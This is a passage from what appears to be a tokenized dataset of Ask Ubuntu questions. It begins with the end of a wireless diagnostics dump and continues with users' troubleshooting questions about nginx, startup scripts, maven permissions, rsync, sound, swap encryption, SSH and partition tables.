beacon : 64ms ago ie : unknown : 0007426c7565536b79 ie : unknown : 010882848b962430486c ie : unknown : 03010b ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : dd090010180201f0000000 cell 06 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=30/70 signal level=-80 dbm encryption key : on essid : '' name fa9911 . '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 64ms ago ie : unknown : 000c4e616d65204641393931312e ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1a1c181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606081500000000000000000000000000000000000000 ie : unknown : dd090010180202000c0000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 cell 07 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=30/70 signal level=-80 dbm encryption key : on essid : '' fadi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000006b08c8181 extra : last beacon : 2544ms ago ie : unknown : 000466616469 ie : unknown : 010882848b960c121824 ie : unknown : 030106 ie : unknown : 050400010000 ie : unknown : 2a0100 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : 32043048606c ie : unknown : dd0900037f01010060ff7f ie : unknown : dd050050f20500 ie : unknown : dd0e0050f204104a0001101044000102 # # # # # iwlist channel # # # # # wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz current frequency:2.462 ghz ( channel 11 ) # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko firmware : rtlwifi/rtl8192cfwu_b.bin firmware : rtlwifi/rtl8192cfwu.bin firmware : rtlwifi/rtl8192cfw.bin description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : ef063698748457bbedb4633 alias : pci : v000010ecd00008176sv*sd*bc*sc*i* alias : pci : v000010ecd00008177sv*sd*bc*sc*i* alias : pci : v000010ecd00008178sv*sd*bc*sc*i* alias : pci : v000010ecd00008191sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , rtl8192c-common , mac80211 intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : d5e4890dc428fa5a1bf92df depends : mac80211 , rtlwifi intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : e1f4663325225ee8dba54ca depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : ziv huang < ziv_huang @ realtek.com > author : georgia < georgia @ realtek.com > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 32f826c623bc49f764f7974 depends : intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > :65:43:53:5f : a2 : bb:5b:70:9e:84 : f1:6d : a7 : c7 sig_hashalgo : sha512 # # # # # modules # # # # # loop lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x1969 : /sys/devices/pci0000:00/0000:00:15.1/0000:06:00.0 ( atl1c ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:15.0/0000:02:00.0 ( rtl8192ce ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 3.247310 ] psmouse serio1 : elantech : assuming hardware version 3 ( with firmware version 0x250f01 ) [ 18.646342 ] rtl8192ce : using firmware rtlwifi/rtl8192cfw.bin [ 18.730826 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 18.731483 ] rtlwifi : wireless switch is on [ 22.877235 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 22.879133 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 25.091042 ] wlan0 : authenticate with < mac address removed > [ 25.114153 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 25.116811 ] wlan0 : authenticated [ 25.117317 ] rtl8192ce 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 25.117325 ] rtl8192ce 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 25.130018 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 25.135637 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=5 ) [ 25.135898 ] wlan0 : associated [ 25.135974 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 25.357409 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=2 ) [ 25.382134 ] wlan0 : authenticate with < mac address removed > [ 25.382338 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 25.384936 ] wlan0 : authenticated [ 25.385261 ] rtl8192ce 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 25.385269 ] rtl8192ce 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 25.385434 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 25.392661 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=5 ) [ 25.392859 ] wlan0 : associated [ 1782.666156 ] wlan0 : deauthenticated from < mac address removed > ( reason : 7 ) [ 1783.946838 ] wlan0 : authenticate with < mac address removed > [ 1783.947159 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 1783.955463 ] wlan0 : authenticated [ 1783.955883 ] rtl8192ce 0000:02:00.0 wlan0 : disabling ht as wmm/qos is not supported by the ap [ 1783.955890 ] rtl8192ce 0000:02:00.0 wlan0 : disabling vht as wmm/qos is not supported by the ap [ 1783.959855 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 1783.962619 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=5 ) [ 1783.962863 ] wlan0 : associated # # # # # # # # # # wireless info end # # # # # # # # # # # #
504783	nginx on ubuntu 12.04 localhost does not render	i installed nginx software and http : // localhost does not render . what to do in default to make localhost show website ?
504785	how can i make ubuntu to run only one application on startup	i am currently developing a quad copter controller that is touch screen and powered by raspberry pi . i already know how to program using python , but i am having trouble making it run my only app on start up ... any suggestions ?
504786	where is the update to 14.04.1 in update-manager ?	i am not looking for a workaround or a hack . i am just confused . 14.04.1 has been released now for a week , and one of my machines which is on 12.04 , and another one which is on 14.04 both do n't have the upgrade options . i see there is a 14.04.5 release on august 7th but i am not sure what a candence event is . https : //wiki.ubuntu.com/trustytahr/releaseschedule it is hard to believe that it is not an issue that is going to be resolved otherwise i would hope this would be posted on the ubuntu blog . i cant be the only one on the last lts waiting for it to update so i can finally go to the latest kernel and properly use my core i7 graphics .
504789	maven only invokable from terminal while root	i 'm following the directions laid out here : http : //java.dzone.com/articles/installing-maven-304-ubuntu everything is in the right place and the sym link is working correctly . however whenever i try to call mvn from the terminal , i get : xyz @ xyz-laptop : ~/desktop $ mvn the program 'mvn ' can be found in the following packages : * maven * maven2 try : sudo apt-get install < selected package > but if i switch to root , then it works fine : sudo su root @ xyz-laptop : /home/xyz/desktop # mvn [ info ] scanning for projects ... [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] build failure [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] total time : 0.079 s [ info ] finished at : 2014-07-30t18:11:54-07:00 [ info ] final memory : 5m/234m [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i 'm very sure this is an issue with permissions but i do n't know what to set the folders permissions to as i 've never hit this error before . this error is frustrating me as well : xyz @ xyz-laptop : /usr/local $ cd apache-maven-3.2.2/ bash : cd : apache-maven-3.2.2/ : permission denied
504790	swiping left on the touchpad opens the photo search . how do i disable this ?	it 's almost random , but most of the time , if i swipe from right to left on the touchpad of my keyboard , it opens the photo search . i have not been able to locate any setting/tweak that explains this or would disable it .
504791	no sound in xubuntu 14.04	i have dual-booted my chromebook with xubuntu 14.04 and have found that the sound is broken . i have tried everyhting that has been mentioned on the internet . i have restarted pulse , uninstalled it , unmuted sound in alsamixer , fiddled around with pavucontrol , and nothing . if this helps , there is no sound notifier in my taskbar , and i ca n't find a way to add one . is it just it 's unmuted in the hardware but the os is just muted and i ca n't find a way to unmute it ? btw i have a samsung series 3 chromebook . update 1 : i have gotten sound notifier in my taskbar now , and it 's on full volume , but nothing comes out . update 2 : i have tried installing drivers but they fail to install . update 3 : in the volume control , when i play youtube videos , it shows audio playing in volume control but no sound is coming out . no , my speakers are not fried as they work fine in chromeos . update 4 : i uninstalled pulse , and works on bootup , but the sound is blasting . when i lower the volume , it mutes . how do i fix this ?
504792	writing a script to rsync all directories	i have a huge set of backup files , each containing a directory of videos . each video directory is slightly different . i would like to merge these into a single directory to conserve , as i do n't really care about which backup each video came from . to do this , i figure that rsync would be the best tool but i 'm having difficulty coming up with a nice clean script to rsync each backup 's video directory with an outside destination . in other words , i want a script that will automate the following process rsync -a ./backups/backup-x/videos/ ./collectedvideos/ rsync -a ./backups/backup-y/videos/ ./collectedvideos/ rsync -a ./backups/backup-z/videos/ ./collectedvideos/ rsync -a ./backups/backup-t/videos/ ./collectedvideos/ where all files in the backups/ directory are `` fair game . '' any suggestions would be appreciated .
504795	do i need to migrate my wubi install ?	i have a dual-boot windows 7 and ubuntu 14.04 system that i originally installed using wubi . i have heard that it would be beneficial to migrate my ubuntu installation as described at how to convert wubi install into regular install ? . however , when i try to unmount /dev/sda3 ( the partition i want to use for ubuntu ) , i always get a message saying it 's in use . also , i think i remember making some partition-related choices during the installation process . could it be that my ubuntu installation is already on its own partition ? if not , what do i do about /dev/sda3 ? here 's the output from parted -l. model : ata mb1000eamze ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 651mb 650mb primary ntfs boot 2 651mb 271gb 271gb primary ntfs 4 271gb 274gb 2146mb primary linux-swap ( v1 ) 3 274gb 1000gb 727gb primary ext4
504796	is there a plugin for keeping desktop icons same size and ordered ?	i would like to have all icons in the same size , and in a ruled desktop . currently if i try to order my desktop icons they can be stacked on top of another , and i hate that , because if i try to place an icon in the middle of other 2 , it gets , literally , in the middle , not replacing the bottom one and making it move one place like in windows . thanks !
504798	rc.local wo n't execute the script	this is my rc.local # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . cd /root/server/srv/ ./start_srv & exit 0 when i execute cd /root/server/srv/ ./start_srv & via terminal myself , it starts normally and everything works but when i try and do it through rc.local it wont start . i know rc.local does n't need sudo etc . i tried executing rc.local myself through terminal and i get the error : `` ca n't cd to ... '' what am i doing wrong ? ls -ld /root : drwx -- -- -- 4 root root 4096 , ls -ld /root/server : drwxr-xr-x 3 root root 4096 , ls -ld /root/server/srv/start_srv : -rwxr-x -- x 1 500 500 468420 ls -ld /root/server/srv : drwxrwxrwx 2 500 500 4096
504802	can not install a software from software center in ubuntu 14.04 lts	i am new to ubuntu . i have installed ubuntu 14.04 lts . i have also created an ubuntu single sign on account . but i can not install anything from ubuntu software center . the install button is not there . all i can see is a disabled use this source button .
504803	package dependency issue	i am unable to install anything at the moment because of dependency issue . when i try to run apt-get -f install , the following happens ; sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libopenni-sensor-primesense0 the following new packages will be installed : libopenni-sensor-primesense0 0 to upgrade , 1 to newly install , 0 to remove and 306 not to upgrade . 2 not fully installed or removed . need to get 0 b/300 kb of archives . after this operation , 1,354 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 228186 files and directories currently installed . ) preparing to unpack ... /libopenni-sensor-primesense0_5.1.0.41-3+trusty1_amd64.deb ... unpacking libopenni-sensor-primesense0 ( 5.1.0.41-3+trusty1 ) ... dpkg : error processing archive /var/cache/apt/archives/libopenni-sensor-primesense0_5.1.0.41-3+trusty1_amd64.deb ( -- unpack ) : trying to overwrite '/etc/openni/globaldefaults.ini ' , which is also in package libopenni-sensor-pointclouds0 5.1.0.41.1-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libopenni-sensor-primesense0_5.1.0.41-3+trusty1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if need be i am willing to wipe the slate clean and start again but i hope it does n't come to that . would appreciate any advice here please
504804	asrock am1b-itx , boinc , tv-browser	users , please excuse my english , my origine language is german . please also excuse my first words in this discussion-forum - they will be the first and only one - because i want to introduce myself and my problems in a very short way . until now i am a win32xp-prof-user and i only have a small amount of knowlage using linux ! there are many reasons i want to change from win to linux , i do not want to go into further details - the list is long - but it is not the subject to be discussed here . i am not a friend in haveing a 1500 watt pc with tripple-gpus or other heating-instruments . well my hardware is : asrock am1b-itx , 8gb-memory , kabini ( am1 ) athlon a6-5350 , dvd , ( ssd ) hdd and an internet-connection ( = max . 55 watt , with extra gpu-card about 110 watt ) . it is a basic pc - good enough for everything except playing extraordinary watt consuming games - mahjongg or a simple games are ok - why not . now i come to my problems with my hardware ( am1-basis = kabini ) and the software ( linux ) . in windows i have many programs i use . some of them are also available in linux , others - there are equvivilants - as good as the win-programs . but there is a programm i do not want to miss - this is boinc ! since years i am calculating with boinc - for seti , einstein , rosetta , enigma , collatz and so on - with cpu and also with gpu ! unfortunately i have many problems with the program `` boinc '' . boinc starts when starting linux - i do not want that as long as this system is a test-system ! if linux runs well , i have no problem when boinc starts with the linux-start . i read , the command `` ( kde ) sudo update-rc.d -f /etc/init.d/boinc-client remove '' will stop boinc at startup - this does not work ( this information was from 2012 ! ) . options i want to set in boinc can not be set because they are not visible in the window . when using the standard-graphics-driver cpu-calulations are ok - but running the pc overnight , it should have requested more data to calculate - it did not ( maybe this is my fault , i will analyze it ) ! a system-restart ( down and up-again ) requested more data to calculate . when using the alternate-graphics-driver `` fglrx and the fglrx-updates '' ( for also using the igpu for calculating ) i had massive linux-problems . linux needed many starts until it was usable again ( it crashed , that is from excessive hardware-problems ( ? ? ? ) , via a boinc-failure at startup until not readable errors , the text appeared and was too fast away to read ) - and the igpu of the athlon a6-5350 ( kabini ) seemed not to be recognized when running boinc/seti - no calculation on the igpu - then , i installed the standard-graphics-driver again . the system was stabilized again . in the internet of boinc i was told : '' amd apus : the amd brazos , kabini and lynx platforms -zacate and kabini for tablet and embedded products and llano , trinity and richland apus for desktops and laptops- are capable of doing gpu work on their own . '' is this only true for win8.x ? if this is true - shame on you amd ! ! ! amd , you sell pcs - only for using winx ? ? ? ( if i missed the `` code of conduct '' with my 2 last sentences - sorry - but in my opinion amd should be ashamed ! ! ! ) . my system in principle is a kabini-system . i have forgotten to tell you about my special `` linux-system '' on a 1000 gb-disk - it is kubuntu `` utopic-desktop-amd64.iso '' downloaded on 29 . july 2014 and the recommended online-updates , installed in english/american with german keyboard ( installing with `` german '' -language crashed ) ! after that i updated to `` german '' and then boinc-installation . sorry about the many words above for the first time in this community . did i do it correct ( ? ) , you said : '' please follow the ubuntu code of conduct when participating within this community . '' ( this many many words i partly understood ... when reading it ... ) . if i did not follow these `` code of conduct '' throw my words away ... if my words are acceptable and if i am welcome into the community - can anybody give me a hint , where i can learn more about my problems ... by the way - i miss a program called `` tv-browser 3.x '' based on java ... ( already known in `` debian '' - ( re ) sources ... whatever the korrect word is ... ) . kind regards quassel
504806	simple way to connect macbook pro laptop to an external display in ubuntu 12.04	i would like to know a simple way to connect a macbook pro laptop to an external vga lcd display in ubuntu 12.04 , using the machine 's mini display-port and a mini display-port to vga adapter . i 've acquired both a usb keyboard and a usb mouse . currently my apple machine is running only ubuntu 12.04 . since i am not familiar with any linux application designed for this purpose , any help will be greatly appreciated . 2014-07-31 thanks very much for your kind suggestions . i am under the impression that the hot keys on a macbook pro work only in osx . please correct me if i am mistaken . julianloui
504812	trouble creating a simple script	i just wanted to create a script that opens teamspeak . i was on here before about that , but i thought it would be more simple by just creating a script . i wanted to make a script to launch the script that opens teamspeak . so i did this : # ! /bin/bash exec /home/austin/programs/teamspeak/launch ( what i renamed the file to for ease ) .sh i named this teamspeak.sh and it did n't work . the thing that is frustrating is that it works if i go into terminal on the desktop and type ./teamspeak.sh it works ! how can i get this to work by just double-clicking it ?
504813	how to contribute binary .debs for others ?	i routinely work with armhf devices , however not all the packages i use exist in a form that apt-get can easily install . therefore i spend a lot of time compiling from source packages that exist on x86 and amd64 repositories . in order to save my time in the future and others time as well , is there a way that is approved to build binaries and then push them back to the repository for others to use ? cheers
504814	problem with dell teac cab-200 installed 14.04	i am using ubuntu 14.04 and i can not get it to recognize my bluetooth adapter . i know the computer can use the adapter because my keyboard is working , but ubuntu tells me i have no adapters and so i can not connect anything else . i have tried using hid2hci which just keeps timing out . i 'm at a complete loss and google has not helped . any suggestions would be great . i should mention that i 've only been running linux for a couple of months , i am capable but in no way an expert . this is what shows up in 'usb-devices' t : bus=01 lev=01 prnt=01 port=03 cnt=01 dev # = 4 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=0644 prodid=0201 rev=07.12 s : manufacturer=dell s : product=cab-200 s : serialnumber=000001178131 c : # ifs= 1 cfg # = 1 atr=c0 mxpwr=98ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage
504817	ec2 , hdfs and hostnames are not resoving	i am trying to setup cloudera 5 hdfs on ec2 . i am using rout53 for dns . below are my modifications . cat /etc/hostname master.hdfs.cloudera.aws.development.west cat /etc/hosts 127.0.0.1 localhost # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters ff02 : :3 ip6-allhosts 172.31.12.68 1.slave.dnhdfs.cloudera.aws.development.west.test.com 1.slave.dnhdfs.cloudera.aws.development.west.test.com 172.31.8.89 master.hdfs.cloudera.aws.development.west.test.com master.hdfs.cloudera.aws.development.west.test.com hostname master.hdfs.cloudera.aws.development.west hostname -f master.hdfs.cloudera.aws.development.west.test.com on the datanode i get this error . 2014-07-31 03:19:32,384 warn org.apache.hadoop.hdfs.server.datanode.datanode : problem connecting to server : master.hdfs.cloudera.aws.development.west.test.com/172.31.8.89:8020 2014-07-31 03:19:38,386 info org.apache.hadoop.ipc.client : retrying connect to server : master.hdfs.cloudera.aws.development.west.test.com/172.31.8.89:8020 . already tried 0 time ( s ) ; retry policy is retryuptomaximumcountwithfixedsleep ( maxretries=10 , sleeptime=1000 milliseconds ) both can ssh without password and ports are open for both . on master , 8020 is running netstat -tulpn | grep :8020 tcp 0 0 127.0.1.1:8020 0.0.0.0 : * listen 20652/java per cloudera run host -v -t a hostname and make sure that hostname matches the output of the hostname command , and has the same ip address as reported by ifconfig for eth0 ; for example : this is what i get : host -v -t a `hostname` trying `` master.hdfs.cloudera.aws.development.west '' received 134 bytes from 172.31.0.2 # 53 in 0 ms trying `` master.hdfs.cloudera.aws.development.west.us-west-1.compute.internal '' host master.hdfs.cloudera.aws.development.west not found : 3 ( nxdomain ) received 147 bytes from 172.31.0.2 # 53 in 0 ms i assume the above is the issue . how do i resolve on ubuntu 12.04 ? what was west.us-west-1.compute.internal used ? thanks ps when changed /etc/hostname to the fqdn it worked but now the hostname and the hostname -f are the same . host -v -t a `hostname` trying `` master.hdfs.cloudera.aws.development.west.test.com '' ; ; - > > header < < - opcode : query , status : noerror , id : 5286 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 0 , additional : 0 ; ; question section : ; master.hdfs.cloudera.aws.development.west.test.com . in a ; ; answer section : master.hdfs.cloudera.aws.development.west.test.com . 60 in a 172.31.8.89
504818	ubuntu 14.04 ( cinnamon desktop ) freezing , typically when using terminal	this is really strange , but frequently , ubuntu freezes when i 'm trying to enter ( even basic ) commands in the terminal . it does randomly happen when opening programs like chrome as well . it freezes for anywhere between 1 to 10 minutes , and during that time i can move my cursor but nothing else . i just recently switched from unity to the cinnamon desktop environment and i think that may be the source of the issue , but i have n't found anyone else with the same setup having this problem . at first it was just an occasional annoyance , but it 's really beginning to interfere with my work ( i 'm typing this in windows ) . i would really appreciate any insight anyone may have , thanks !
504826	swap partition get damaged when encrypted	i upgraded my system to ubuntu 14.04lts , i encrypted the home & the swap partition during the installation since it was already encrypted in the old version . but later i noticed swap partition is not used & using the gparted i found the swaps is damaged , i re-formatted the swap partition as linux-swap & fixed the uuid in the fstab then cleared the crypttab , then swap was working fine but without the encryption . as soon as i run the ecryptfs-setup-swap to encrypt the swap partition then reboot the system it gets damaged . this link shows the steps i followed any idea how to fix this ?
504830	using ubuntu past support cycle	hi i am new to linux in general but after trying way too many distro 's i have found the one i like is the new ubuntu mate-remix is the nice looks of ubuntu but without unity which i do not like anyways the only reservation i have with using this is the fact that it has a short support cycle as it is not based off an lts version now seeing as i have been told of how much more secure linux is over windows ( which is why i am interested in using it ) would it be ok to continue to use the version after that short support cycle has ended with windows you are forced to upgrade after support ends like in the case of windows xp but i am wondering seeing as viruses are not really and issue like they are on windows can i continue to run it unsupported as long as everything is running well ?
504834	strange file browser - how to configure ?	i have an in-built file browser in draftsight , with which i 'm not familiar . how is it called and how could i configure/replace it ? i need to see the places list on the left hand side .
504836	not able to configure ssh in ubuntu 14.04 lts	i downloaded and installed ubuntu 14.04 lts on my vm and found that ssh was not working . tried following but nothing worked : sudo apt-get install ssh i see only openssh_client installed , i do n't see openssh_server not installed . can you help me to install openssh_client , i tried sudo apt-get install openssh-server this gave following error : package openssh-server is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'openssh-server ' has no installation candidate ''
504839	ubuntu 14.04 - unable to type unicode / rupee sign	i was able to insert rupee sign ( âš ) using the alt-r + 4 key combination , but now i 'm unable to do so . i 'm not able to feed any other unicode char using the ctrl + shift + u combination either . i do n't know whether its some update or something that has led to this issue . system : ubuntu 14.04 64bit desktop : unity strangely , my ibus daemon too starts up with unity . i 've tried quitting it and trying to feed the unicode , but to no avail !
504840	my ntfs partition appear so many	my windows 8 is missing in grub after installing a new linux distro ( elemetary os ) , i already have ubuntu . i booted into liveusb and ran boot-repair and was grub fixed , but when i boot into ubuntu now i get kernel panics . output of fdisk -l : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x78a55a5f device boot start end blocks id system /dev/sda1 * 2048 29296639 14647296 83 linux /dev/sda2 29296640 78125055 24414208 83 linux /dev/sda3 173058048 200400895 13671424 83 linux /dev/sda4 200402942 488392064 143994561+ f w95 ext 'd ( lba ) /dev/sda5 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda6 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda7 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda8 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda9 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda10 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda11 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda12 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda13 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda14 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda15 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda16 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda17 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda18 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda19 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda20 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda21 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda22 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda23 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda24 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda25 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda26 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda27 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda28 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda29 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda30 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda31 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda32 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda33 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda34 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda35 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda36 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda37 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda38 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda39 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda40 204802112 283592703 39395296 7 